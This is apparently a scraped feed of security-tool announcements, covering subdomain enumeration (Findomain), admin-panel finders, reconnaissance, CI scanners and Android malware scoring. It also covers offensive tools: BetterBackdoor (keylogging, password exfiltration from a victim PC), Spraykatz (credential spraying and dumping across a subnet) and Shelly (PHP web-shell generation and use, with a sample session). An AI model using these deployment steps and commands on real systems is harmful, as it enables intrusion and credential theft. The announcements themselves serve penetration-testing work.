    See Subdomains Enumeration: what is, how to do it, monitoring automation using webhooks and centralizing your findings for a detailed guide including real world examples of how you get the most out of the tool.

    How it works?
    It tool doesn't use the common methods for sub(domains) discover, the tool uses Certificate Transparency logs and specific well tested APIs to find subdomains. It method make it tool the most faster and reliable. The tool make use of multiple public available APIs to perform the search. If you want to know more about Certificate Transparency logs, read https://www.certificate-transparency.org/
    APIs that we are using at the moment:
    Notes
    APIs marked with **, require an access token to work. Search in the Findomain documentation how to configure and use it.
    APIs marked with * can optionally be used with an access token, create one if you start experiencing problems with that APIs. Search in the Findomain documentation how to configure and use it.
    More APIs?
    If you know other APIs that should be added, comment here.

    Development
    In order to make sure Findomain will not be broken on some commit I have created the develop branch where new features and improvements are pushed before they go to master branch. In resume the difference is: develop branch and beta releases aren't ready for production purposes but testing or development purposes and master branch and non-beta releases are ready for production purposes. If you are a developer or want to be a beta tester of the new features that are added to Findomain then use the develop branch, otherwise always use the master branch. Every new feature is tested before it goes to master by the Findomain beta testers that are only (@sumgr0) at the moment, I will appreciate if you join to the testing process, just send me a DM in Twitter (@edu4rdshl).
    If you are a packager of Findomain for X system distribution always go for the master branch if using git or non-beta releases if using releases model.
    Build the development version:
    You need to have rust, make and perl installed in your system first.
    $ git clone https://github.com/Edu4rdSHL/findomain.git -b develop # Only the develop branch is needed
    $ cd findomain
    $ cargo build --release
    $ ./target/release/findomain
    To update the repository when new commits are added, just go to the folder where Findomain's develop branch was cloned and excute:
    $ git pull
    $ cargo build --release
    $ ./target/release/findomain

    Installation
    We offer binarys ready to use for the following platforms (all are for 64 bits only):
    If you need to run Findomain in another platform, continue reading the documentation.

    Build for 32 bits or another platform
    If you want to build the tool for your 32 bits system or another platform, follow it steps:
    Note: You need to have rust, make and perl installed in your system first.
    Using the crate:
    1. cargo install findomain
    2. Execute the tool from $HOME/.cargo/bin. See the cargo-install documentation.
    Using the Github source code:
    1. Clone the repository or download the release source code.
    2. Extract the release source code (only needed if you downloaded the compressed file).
    3. Go to the folder where the source code is.
    4. Execute cargo build --release
    5. Now your binary is in target/release/findomain and you can use it.

    Installation Android (Termux)
    Install the Termux package, open it and follow it commands:
    $ pkg install rust make perl
    $ cargo install findomain
    $ cd $HOME/.cargo/bin
    $ ./findomain

    Installation in Linux using source code
    If you want to install it, you can do that manually compiling the source or using the precompiled binary.
    Manually: You need to have rust, make and perl installed in your system first.
    $ git clone https://github.com/Edu4rdSHL/findomain.git
    $ cd findomain
    $ cargo build --release
    $ sudo cp target/release/findomain /usr/bin/
    $ findomain

    Installation in Linux using compiled artifacts
    $ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
    $ chmod +x findomain-linux
    $ ./findomain-linux
    If you are using the BlackArch Linux distribution, you just need to use:
    $ sudo pacman -S findomain

    Installation Aarch64 (Raspberry Pi)
    $ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-aarch64
    $ chmod +x findomain-aarch64
    $ ./findomain-aarch64

    Installation Windows
    Download the binary from https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-windows.exe
    Open a CMD shell and go to the dir where findomain-windows.exe was downloaded.
    Exec: findomain-windows in the CMD shell.

    Installation MacOS
    $ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx
    $ chmod +x findomain-osx.dms
    $ ./findomain-osx.dms

    Updating Findomain to latest version
    To update Findomain to latest version, you can be in some scenarios:
    1. You downloaded a precompiled binary: If you are using a precompiled binary, then you need to download the new binary.
    2. You are using it from BlackArch Linux: Just run pacman -Syu
    3. You have cloned the repo and compiled it from source: You just need to go to the folder where the repo is cloned and run: git pull && cargo build --release, when finish, you have your executable in target/release/findomain.
    4. You downloaded a source code release and compiled it: You need to download the new source code release and compile it again.
    5. I used cargo install findomain: then just run cargo install --force findomain.

    Access tokens configuration
    In in section you can found the steps about how to configure APIs that need or can be used with access tokens.

    Configuring the Facebook API
    History
    When I added the Facebook CT API in the beginning I was providing a Webhook token to search in the API, as consequence when a lot of users were using the same token the limit was reached and user can't search in the Facebook API anymore until Facebook unlocked it again. Since Findomain version 0.2.2, users can set their own Facebook Access Token for the webook and pass it to findomain setting the findomain_fb_token system variable. The change was introduced here. Also since 23/08/2019 I have removed the webhook that was providing that API token a nd it will not work anymore, if you're using findomain < 0.2.2 you are affected, please use a version >= 0.2.2.
    Since Findomain 0.2.4 you don't need to explicity set the findomain_fb_token variable in your system, if you don't set that variable then Findomain will use one of our provided access tokens for the Facebook CT API, otherwise, if you set the environment variable then Findomain will use your token. See it commit. Please, if you can create your own token, do it. The usage limit of access tokens is reached when a lot of people use it and then the tool will fail.
    Getting the Webhook token
    The first step is get your Facebook application token. You need to create a Webhook, follow the next steps:
    1. Open https://developers.facebook.com/apps/
    2. Clic in "Create App", put the name that you want and send the information.
    3. In the next screen, select "Configure" in the Webhooks option.
    4. Go to "Configuration" -> "Basic" and clic on "Show" in the "App secret key" option.
    5. Now open in your browser the following URL: https://graph.facebook.com/oauth/access_token?client_id=your-app-id&client_secret=your-secret-key&grant_type=client_credentials
    Note: replace your-app-id by the number of your webhook identifier and your-secret-key for the key that you got in the 4th step.
    1. You should have a JSON like:
    {
    "access_token": "xxxxxxxxxx|yyyyyyyyyyyyyyyyyyyyyyy",
    "token_type": "bearer"
    }
    1. Save the access_token value.
    Now you can use that value to set the access token as following:
    Unix based systems (Linux, BSD, MacOS, Android with Termux, etc):
    Put in your terminal:
    $ findomain_fb_token="YourAccessToken" findomain -(options)
    Windows systems:
    Put in the CMD command prompt:
    > set findomain_fb_token=YourAccessToken && findomain -(options)
    Note: In Windows you need to scape special characters like |, add ^ before the special character to scape it and don't quote the token. Example: set findomain_fb_token=xxxxxxx^|yyyyyyyy && findomain -(options)
    Tip: If you don't want to write the access token everytime that you run findomain, export the findomain_fb_token in Unix based systems like putting export findomain_fb_token="YourAccessToken" into your .bashrc and set the findomain_fb_token variable in your Windows system as described here.

    Configuring the Spyse API to use with token
    1. Open https://account.spyse.com/register and make the registration process (include email verification).
    2. Log in into your spyse account and go to https://account.spyse.com/user
    3. Search for the "API token" section and clic in "Show".
    4. Save that access token.
    Now you can use that value to set the access token as following:
    Unix based systems (Linux, BSD, MacOS, Android with Termux, etc):
    Put in your terminal:
    $ findomain_spyse_token="YourAccessToken" findomain -(options)
    Windows systems:
    Put in the CMD command prompt:
    > set findomain_spyse_token=YourAccessToken && findomain -(options)
    Note: In Windows you need to scape special characters like |, add ^ before the special character to scape it and don't quote the token. Example: set findomain_spyse_token=xxxxxxx^|yyyyyyyy && findomain -(options)
    Tip: If you don't want to write the access token everytime that you run findomain, export the findomain_spyse_token in Unix based systems like putting export findomain_spyse_token="YourAccessToken" into your .bashrc and set the findomain_spyse_token variable in your Windows system as described here.

    Configuring the Virustotal API to use with token
    1. Open https://www.virustotal.com/gui/join-us and make the registration process (include email verification).
    2. Log in into your spyse account and go to https://www.virustotal.com/gui/user/YourUsername/apikey
    3. Search for the "API key" section.
    4. Save that API key.
    Now you can use that value to set the access token as following:
    Unix based systems (Linux, BSD, MacOS, Android with Termux, etc):
    Put in your terminal:
    $ findomain_virustotal_token="YourAccessToken" findomain -(options)
    Windows systems:
    Put in the CMD command prompt:
    > set findomain_virustotal_token=YourAccessToken && findomain -(options)
    Note: In Windows you need to scape special characters like |, add ^ before the special character to scape it and don't quote the token. Example: set findomain_virustotal_token=xxxxxxx^|yyyyyyyy && findomain -(options)
    Tip: If you don't want to write the access token everytime that you run findomain, export the respective system variable in your OS. For Unix based systems it can be done putting export VariableName="VariableValue" into your .bashrc. For Windows system it can be done as described here or here.

    Subdomains Monitoring
    Findomain is capable of monitor a specific domain or a list of domains for new subdomains and send the data to Slack, Discord or Telegram webhooks. All what you need is a server or your computer with PostgreSQL database server installed. Have in mind that you can have only a central server/computer with PostgreSQL installed and connect to it from anywhere to perform the monitoring tasks.
    IMPORTANT NOTE: Findomain is a subdomains enumeration and monitor tool, not a job scheduler. If you want to run findomain automatically then you need to configure a job scheduler like systemd-timers or the well known CRON in *NIX systems, Termux in Android or MAC and the Windows Task Scheduler in Windows.
    Options
    You can set the following command line options when using the subdomains monitoring feature:
            --postgres-database <postgres-database>    Postgresql database.
    --postgres-host <postgres-host> Postgresql host.
    --postgres-password <postgres-password> Postgresql password.
    --postgres-port <postgres-port> Postgresql port.
    --postgres-user <postgres-user> Postgresql username.
    System variables that can be configured
    Findomain reads system variables to make use of webhooks. Currently Findomain support the following webhooks (click on them to see how to setup the webhooks):
    The available system variables that you have are:
    findomain_discord_webhook: Discord webhook URL.
    findomain_slack_webhook: Slack webhook URL.
    findomain_telegrambot_token: Telegram bot autentication token.
    findomain_telegrambot_chat_id: Unique identifier for the target chat or username of the target channel.
    Tip: If you don't want to write the webhook parameters everytime that you run findomain, export the respective system variable in your OS. For Unix based systems it can be done putting export VariableName="VariableValue" into your .bashrc. For Windows system it can be done as described here or here.
    Default values while connecting to database server
    Findomain have some default values that are used when they are not set. They are listed below:
    1. If you only specify the -m flag without more arguments or don't specify one of the options Findomain sets:
    Subdomains monitoring examples
    1. Connect to local computer and local PostgreSQL server with specific username, password and database and push the data to both Discord and Slack webhooks
    $ findomain_discord_webhook='https://discordapp.com/api/webhooks/XXXXXXXXXXXXXXX' findomain_slack_webhook='https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX' findomain -m -t example.com --postgres-database findomain --postgres-user findomain --postgres-host localhost --postgres-port 5432
    1. Connect to remote computer/server and remote PostgreSQL server with specific username, password and database and push the data to both Discord and Slack webhooks
    $ findomain_discord_webhook='https://discordapp.com/api/webhooks/XXXXXXXXXXXXXXX' findomain_slack_webhook='https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX' findomain -m -t example.com --postgres-user postgres --postgres-password psql  --postgres-host 192.168.122.130 --postgres-port 5432
    1. Connect to remote computer/server and remote PostgreSQL server with specific username, password and database and push the data to Telegram webhook
    $ findomain_telegrambot_token="Your_Bot_Token_Here" findomain_telegrambot_chat_id="Your_Chat_ID_Here" findomain -m -t example.com --postgres-user postgres --postgres-password psql  --postgres-host 192.168.122.130 --postgres-port 5432
    1. Connect to local computer using the default values
    $ findomain_discord_webhook='https://discordapp.com/api/webhooks/XXXXXXXXXXXXXXX' findomain_slack_webhook='https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX' findomain -m -t example.com

    Usage
    See findomain -h/--help to see all the options.
    For subdomains monitoring examples Subdomains Monitoring for more information.
    You can use the tool in two ways, only discovering the domain name or discovering the domain + the IP address.

    Examples
    1. Make a simple search of subdomains and print the info in the screen:
    findomain -t example.com
    1. Make a search of subdomains and print the info in the screen:
    findomain -t example.com
    1. Make a search of subdomains and export the data to a output file (the output file name in it case is example.com.txt):
    findomain -t example.com -o
    1. Make a search of subdomains and export the data to a custom output file name:
    findomain -t example.com -u example.txt
    1. Make a search of only resolvable subdomains:
    findomain -t example.com -r
    1. Make a search of only resolvable subdomains, exporting the data to a custom output file.
    findomain -t example.com -r -u example.txt
    1. Search subdomains from a list of domains passed using a file (you need to put a domain in every line into the file):
    findomain -f file_with_domains.txt
    1. Search subdomains from a list of domains passed using a file (you need to put a domain in every line into the file) and save all the resolved domains into a custom file name:
    findomain -f file_with_domains.txt -r -u multiple_domains.txt
    1. Query the Findomain database created with Subdomains Monitoring.
    findomain -t example.com --query-database
    1. Query the Findomain database created with Subdomains Monitoring and save results to a custom filename.
    findomain -t example.com --query-database -u subdomains.txt
    1. Import subdomains from several files and work with they in the Subdomains Monitoring process:
    findomain --import-subdomains file1.txt file2.txt file3.txt -m -t example.com


    OKadminFinder - Admin Panel Finder / Admin Login Page Finder

    $
    0
    0

    OKadminFinder: Easy way to find admin panel of site.
    • Requirements
      • Linux
        sudo apt install tor
        sudo apt install python3-socks (optional)
        pip3 install --user -r requirements.txt
      • Windows
        download tor expert bundlepip3 install -r requirements.txt


    • Usage
      • Preview
      • Linux
        git clone https://github.com/mIcHyAmRaNe/okadminfinder3.git
        cd okadminfinder3
        chmod +x okadminfinder.py
        python3 okadminfinder.py
      • Windows
        download & extract zip
        cd okadminfinder3
        py -3 okadminfinder.py
      • Pentestbox (same procedure as Linux)
        you can add an alias by adding this line: okadminfinder=py -3 "%pentestbox_ROOT%/bin/Path/to/okadminfinder3/okadminfinder.py" $* to C://Pentestbox/bin/customtools/customaliases file and so you'll be able to launch it using okadminfinder

    Features
    • More than 500 potential admin panels
    • Tor & Proxy
    • Random-Proxy
    • Random-Agents
    • Console work with params, like: okadminfinder.py -u example.com --proxy 127.0.0.1:8080
    • Self-Update
    • Classify admin panel links by popularity
    • Multithreading, for faster work
    • Adding more potential admin panel pages

    Youtube videos





    BetterBackdoor - A Backdoor With A Multitude Of Features

    $
    0
    0
    A backdoor is a tool used to gain remote access to a machine.
    Typically, backdoor utilities such as NetCat have 2 main functions: to pipe remote input into cmd or bash and output the response. This is useful, but it is also limited. BetterBackdoor overcomes these limitations by including the ability to inject keystrokes, get screenshots, transfer files, and many other tasks.

    Features
    BetterBackdoor can create and control a backdoor.
    This created backdoor can:
    • Run Command Prompt commands
    • Run PowerShell scripts
    • Run DuckyScripts to inject keystrokes
    • Exfiltrate files based on extension
    • Exfiltrate Microsoft Edge and WiFi passwords
    • Send and receive files to and from victim's computer
    • Start a KeyLogger
    • Get a screenshot of victim's computer
    • Get text copied to victim's clipboard
    • Get contents from a victim's file (cat)

    This backdoor uses a client and server socket connection to communicate. The attacker starts a server and the victim connects to this server as a client. Once a connection is established, commands can be sent to the client in order to control the backdoor.
    To create the backdoor, BetterBackdoor:
    • Creates 'run.jar', the backdoor jar file, and copied it to directory 'backdoor'.
    • Appends a text file containing the server's IPv4 address to 'run.jar'.
    • If desired, copies a Java Runtime Environment to 'backdoor' and creates batch file 'run.bat' for running the backdoor in the packaged Java Runtime Environment.
    To start the backdoor on a victim PC, transfer all files from the directory 'backdoor' onto a victim PC.
    If a JRE is packaged with the backdoor, execute run.bat, otherwise execute run.jar.
    This will start the backdoor on the victim's PC.
    Once running, to control the backdoor you must return to BetterBackdoor and run option 1 at start while connected to the same WiFi network as the victim's computer.

    Demo


    Requirements
    • A Java JDK distribution >=8 must be installed and added to PATH.
    • You must use the same computer to create and control the backdoor.
      • The computer used to create the backdoor must be on the same WiFi network as the victim's computer.
      • The IPv4 address of this computer must remain static in the time between creating the backdoor and controlling it.
    • The computer used to control the backdoor must have their firewall deactivated, and if the computer has a Unix OS, must run BetterBackdoor as 'sudo'.

    Compatibility
    BetterBackdoor is compatible with Windows, Mac, and Linux, while the backdoor is only compatible with Windows.

    Installation
    # clone BetterBackdoor
    git clone https://github.com/ThatcherDev/BetterBackdoor.git

    # change the working directory to BetterBackdoor
    cd BetterBackdoor

    # build BetterBackdoor with Maven
    # for Windows run
    mvnw.cmd clean package

    # for Linux run
    chmod +x mvnw
    ./mvnw clean package

    # for Mac run
    sh mvnw clean package

    Usage
    java -jar betterbackdoor.jar


    Spraykatz - A Tool Able To Retrieve Credentials On Windows Machines And Large Active Directory Environments

    $
    0
    0

    Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.
    It simply tries to procdump machines and parse dumps remotely in order to avoid detections by antivirus softwares as much as possible.

    Installation
    This tool is written for python>=3. Do not use this on production environments!

    Ubuntu
    On a fresh updated Ubuntu.
    apt update
    apt install -y python3.6 python3-pip git nmap
    git clone --recurse-submodules https://github.com/aas-n/spraykatz.git
    cd spraykatz
    pip3 install -r requirements.txt

    Using Spraykatz
    A quick start could be:
    ./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24

    Mandatory arguments

    SwitchesDescription
    -u, --usernameUser to spray with. He must have admin rights on targeted systems in order to gain remote code execution.
    -p, --passwordUser's password or NTLM hash in the LM:NT format.
    -t, --targetsIP addresses and/or IP address ranges. You can submit them via a file of targets (one target per line), or inline (separated by commas).

    Optional arguments
    SwitchesDescription
    -d, --domainUser's domain. If he is not member of a domain, simply use -d . instead.
    -v, --verbosityVerbosity mode {warning, info, debug}. Default == info.

    Acknowlegments
    Spraykatz uses slighlty modified parts of the following projects:


    Written by Lydéric Lefebvre


    Shelly - Simple Backdoor Manager With Python (Based On Weevely)

    $
    0
    0

    Shelly adalah sebuah tool sederhana yang ditulis menggunakan Python, yang berfungsi untuk meremote sebuah website

    Instalation :
    $ git clone https://github.com/tegal1337/Shelly
    $ cd Shelly
    $ python3 shell.py

    Requirements :
    sudo pip install -r requirements.txt

    Example :

    python3 shell.py -g backdoor -p tegal1337
    ______ ____
    / __/ / ___ / / __ __
    _\ \/ _ / -_/ / / // /
    /___/_//_\__/_/_/\_, /
    /___/ v.1
    --------------------------
    Python shell - Tegal1337 |
    Generate :
    [+] ./backdoor.py -g "nama_shell" -p "password"
    Connect Server :
    [+] ./backdoor.py -u "url_shell" -p "password"

    Backdoor berhasil dibuat dengan nama backdoor.php dan password tegal1337

    dalpan@Tegal1337:~/Tools$ mv backdoor.php /opt/lampp/htdocs/php-futsal/
    dalpan@Tegal1337:~/Tools$ python3 shell.py -u "http://localhost/php-futsal/backdoor.php" -p tegal1337
    /opt/lampp/htdocs/php-futsal$ id
    uid=1(daemon) gid=1(daemon) groups=1(daemon)


    Contact :
    • Email : contact@dalpan.co
    • FB : fb.com/dalpan.me


    huskyCI - Performing Security Tests Inside Your CI

    $
    0
    0

    huskyCI is an open-source tool that performs security tests inside CI pipelines of multiple projects and centralizes all results into a database for further analysis and metrics.

    How does it work?
    The main goal of this project is to help development teams improve the quality of their code by finding vulnerabilities as quickly as possible, and thus addressing them.
    huskyCI can perform static security analysis in Python (Bandit and Safety), Ruby (Brakeman), JavaScript (Npm Audit and Yarn Audit), Golang (Gosec), and Java(SpotBugs plus Find Sec Bugs). It can also audit repositories for secrets like AWS Secret Keys, Private SSH Keys, and many others using GitLeaks. You should check our wiki to better understand how this tool could help securing your organization projects!

    Requirements

    Docker and Docker-Compose
    The easiest way to deploy huskyCI locally is by using Docker and Docker Compose, thus you should have them installed on your machine.

    Golang
    You must also have Go installed and huskyCI needs to be inside your $GOPATH to run properly.

    Installing
    After cloning this repository, simply run the command inside huskyCI's folder:
    make install

    Running
    After installing, an .env file with instructions to huskyCI should be generated:
    $ cat .env
    export HUSKYCI_CLIENT_REPO_URL="https://github.com/globocom/huskyCI.git"
    export HUSKYCI_CLIENT_REPO_BRANCH="vulns-Golang"
    export HUSKYCI_CLIENT_API_ADDR="http://localhost:8888"
    export HUSKYCI_CLIENT_API_USE_HTTPS="false"
    export HUSKYCI_CLIENT_TOKEN="{YOUR_TOKEN_HERE}"
    You can change the repository and branch being analysed by modifying the contents of HUSKYCI_CLIENT_REPO_URL and HUSKYCI_CLIENT_REPO_BRANCH. Then simply source it through the command:
    . .env
    Mac OS:
    make run-client
    Linux:
    make run-client-linux

    Frontend
    huskyCI has also a cool Frontend built in React so you can check some stats regarding your huskyCI results! After running your first scan, simply visit:
    http://localhost:8080


    Documentation
    You can find huskyCI documentation here.



    AttackSurfaceMapper - A Tool That Aims To Automate The Reconnaissance Process

    $
    0
    0

    Attack Surface Mapper is a reconnaissance tool that uses a mixture of open source intellgence and active techniques to expand the attack surface of your target. You feed in a mixture of one or more domains, subdomains and IP addresses and it uses numerous techniques to find more targets. It enumerates subdomains with bruteforcing and passive lookups, Other IPs of the same network block owner, IPs that have multiple domain names pointing to them and so on.
    Once the target list is fully expanded it performs passive reconnaissance on them, taking screenshots of websites, generating visual maps, looking up credentials in public breaches, passive port scanning with Shodan and scraping employees from LinkedIn.

    Demo


    Setup
    As this is a Python based tool, it should theoretically run on Linux, ChromeOS (Developer Mode), macOS and Windows.
    [1] Download AttackSurfaceMapper
    $ git clone https://github.com/superhedgy/AttackSurfaceMapper
    [2] Install Python dependencies
    $ cd AttackSurfaceMapper
    $ python3 -m pip install --no-cache-dir -r requirements.txt
    [3] Add optional API keys to enable more data gathering
    Register and obtain an API key from:
    Edit and enter the keys in keylist file
    $ nano keylist.asm

    Example run command
    $ python3 asm.py -t your.site.com -ln -w resources/top100_sublist.txt -o demo_run

    Optional Parameters
    Additional optional parameters can also be set to choose to include active reconnaissance modules in addition to the default passive modules.
    |<------ AttackSurfaceMapper - Help Page ------>|

    positional arguments:
    targets Sets the path of the target IPs file.

    optional arguments:
    -h, --help show this help message and exit
    -f FORMAT, --format FORMAT
    Choose between CSV and TXT output file formats.
    -o OUTPUT, --output OUTPUT
    Sets the path of the output file.
    -sc, --screen-capture
    Capture a screen shot of any associated Web Applications.
    -sth, --stealth Passive mode allows reconaissaince using OSINT techniques only.
    -t TARGET, --target TARGET
    Set a single target IP.
    -V, --version Displays the current version.
    -w WORDLIST, --wordlist WORDLIST
    Specify a lis t of subdomains.
    -sw SUBWORDLIST, --subwordlist SUBWORDLIST
    Specify a list of child subdomains.
    -e, --expand Expand the target list recursively.
    -ln, --linkedinner Extracts emails and employees details from linkedin.
    -v, --verbose Verbose ouput in the terminal window.

    Authors: Andreas Georgiou (@superhedgy)
    Jacob Wilkin (@greenwolf)

    Authors


    Pylane - An Python VM Injector With Debug Tools, Based On GDB

    $
    0
    0

    Pylane is a python vm injector with debug tools, based on gdb and ptrace. Pylane uses gdb to trace python process, inject and run some code in its python vm.

    Usage
    use inject command to inject a python script in an process:
    pylane inject <PID> <YOUR_PYTHON_FILE>
    use shell command to inject an interactive shell:
    pylane shell <PID>
    Pylane shell features:
    • use IPython as its interactive interface, support magic functions like ? and %
    • support remote automatic completion
    • provide debug toolkit functions, such as:
      • lookup class or instance by name
      • get source code of an object
      • print all threads' stack and locals

    Install
    pip install pylane
    pylane should be installed in virtualenv the target process uses or in os python lib.

    Compatibility
    Support Linux and BSD


    PAKURI - Penetration Test Achieve Knowledge Unite Rapid Interface

    $
    0
    0

    What's PAKURI
    In Japanese, imitating is called “Pakuru”.
    ぱくる (godan conjugation, hiragana and katakana パクる, rōmaji pakuru)
    1. eat with a wide open mouth
    2. steal when one isn't looking, snatch, swipe
    3. copy someone's idea or design
    4. nab, be caught by the police
    Wiktionary:ぱくる

    Description
    Pentesters love to move their hands. However, I do not like troublesome work. Simple work is performed semi-automatically with simple operations. PAKURI executes commands frequently used in penetration tests by simply operating the numeric keypad. You can test penetration as if you were playing a fighting game.

    Presentation

    Abilities of "PAKURI".
    • Intelligence gathering.
    • Vulnerability analysis.
    • Visualize.
    • Brute Force Attack.
    • Exploitation.

    Your benefits.
    By using our PAKURI, you will benefit from the following.
    For redteam:
    (a) This saves you the trouble of entering frequently used commands.
    (b) Beginner pentester can learn the floe of attacks using PAKURI.
    For blueteam:
    (c) Attack packets can be generated with a simple operation.
    NOTE
    If you are interested, please use them in an environment under your control and at your own risk. And, if you execute the PAKURI on systems that are not under your control, it may be considered an attack and you may have legally liabillity for your action.

    Features

    Install
    bash install.sh

    Usage
    root@kali:/usr/share/pakuri# ./pakuri.sh

    Main



    Scanning



    Exploit



    Config



    Command



    Operation check environment
    • OS: KAli Linux 2019.4
    • Memory: 8.0GB
    This tool is not yet complete. It will be updated sequentially.


    Malwinx - Just A Normal Flask Web App To Understand Win32Api With Code Snippets And References

    $
    0
    0
    A normal flask web app to learn win32api with code snippets and references.

    Prerequisite
    You need to download the following package before starting it
    pip install flask
    pip install pefile
    pip install requests

    Usage
    $ python flaskapp.py

    Live Demo


    Here is the Walkthrough:
    1. Upload the exe or dll.
    1. The function of exe and dll will appear.
    1. We need to just click any of the function. For example, purpose lets choose LoadLibraryA.
    1. The code usage of any function can be extracted by clicking on these options.



    Quark-Engine - An Obfuscation-Neglect Android Malware Scoring System

    $
    0
    0

    An Obfuscation-Neglect Android Malware Scoring System


    Concepts
    Android malware analysis engine is not a new story. Every antivirus company has their own secrets to build it. With curiosity, we develop a malware scoring system from the perspective of Taiwan Criminal Law in an easy but solid way.
    We have an order theory of criminal which explains stages of committing a crime. For example, crime of murder consists of five stages, they are determined, conspiracy, preparation, start and practice. The latter the stage the more we’re sure that the crime is practiced.
    According to the above principle, we developed our order theory of android malware. We develop five stages to see if the malicious activity is being practiced. They are 1. Permission requested. 2. Native API call. 3. Certain combination of native API. 4. Calling sequence of native API. 5. APIs that handle the same register. We not only define malicious activities and their stages but also develop weights and thresholds for calculating the threat level of a malware.
    Malware evolved with new techniques to gain difficulties for reverse engineering. Obfuscation is one of the most commonly used techniques. In this talk, we present a Dalvik bytecode loader with the order theory of android malware to neglect certain cases of obfuscation.
    Our Dalvik bytecode loader consists of functionalities such as 1. Finding cross reference and calling sequence of the native API. 2. Tracing the bytecode register. The combination of these functionalities (yes, the order theory) not only can neglect obfuscation but also match perfectly to the design of our malware scoring system.

    Detail Report
    This is a how we examine a real android malware (candy corn) with one single rule (crime).
    $ quark -a sample/14d9f1a92dd984d6040cc41ed06e273e.apk \
    -r rules/ \
    --detail


    Summary Report
    Examine with rules.
    quark -a sample/14d9f1a92dd984d6040cc41ed06e273e.apk \
    -r rules/ \
    --easy


    Installation
    $ git clone https://github.com/quark-engine/quark-engine.git; cd quark-engine/quark
    $ pipenv install
    $ pipenv shell
    $ python setup.py install
    Make sure your python version is 3.7, or you could change it from Pipfile to what you have.

    Usage
    $ quark --help
    usage: quark [-h] [-e] [-d] -a APK -r RULE

    optional arguments:
    -h, --help show this help message and exit
    -e, --easy show easy report
    -d, --detail show detail report
    -a APK, --apk APK APK file
    -r RULE, --rule RULE Rules need to be checked


    Viewing all 5854 articles
    Browse latest View live


    <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>